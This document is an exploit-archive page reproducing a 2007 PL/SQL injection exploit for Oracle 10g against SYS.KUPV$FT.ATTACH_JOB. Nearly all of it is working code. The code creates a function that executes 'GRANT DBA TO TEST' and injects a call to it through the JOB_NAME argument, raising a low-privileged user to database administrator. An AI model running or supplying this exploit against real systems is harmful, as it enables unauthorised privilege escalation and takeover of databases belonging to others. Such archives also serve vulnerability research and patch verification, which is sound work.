Oracle 10g SYS.KUPV$FT.ATTACH_JOB PL/SQL Injection Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Oracle 10g SYS.KUPV$FT.ATTACH_JOB PL/SQL Injection Exploit
# Published : 2007-01-23
# Author : Joxean Koret
# Previous Title : Oracle 10g SYS.KUPW$WORKER.MAIN PL/SQL Injection Exploit
# Next Title : Oracle 10g SYS.DBMS_CDC_IMPDP.BUMP_SEQUENCE PL/SQL Injection

/**
* Exploit for Oracle10g R1 and R2 prior to CPU Oct 2006
* Joxean Koret <joxeankoret@yahoo.es>
* Privileges needed:
*
* - EXECUTE_CATALOG_ROLE
* - CREATE PROCEDURE
*
*/
select *
from user_role_privs
;

CREATE OR REPLACE FUNCTION F1
RETURN NUMBER AUTHID CURRENT_USER
IS
PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
EXECUTE IMMEDIATE 'GRANT DBA TO TEST';
COMMIT;
RETURN(1);
END;
/

DECLARE
USER_NAME VARCHAR2(200);
JOB_NAME VARCHAR2(200);
NEW_JOB BOOLEAN;
v_Return NUMBER;
BEGIN
USER_NAME := 'OWNER';
JOB_NAME := ''' OR ' || USER || '.f1() = 1--';

v_Return := SYS.KUPV$FT.ATTACH_JOB(
USER_NAME => USER_NAME,
JOB_NAME => JOB_NAME,
NEW_JOB => NEW_JOB
);
END;
/

// www.Syue.com [2007-01-23]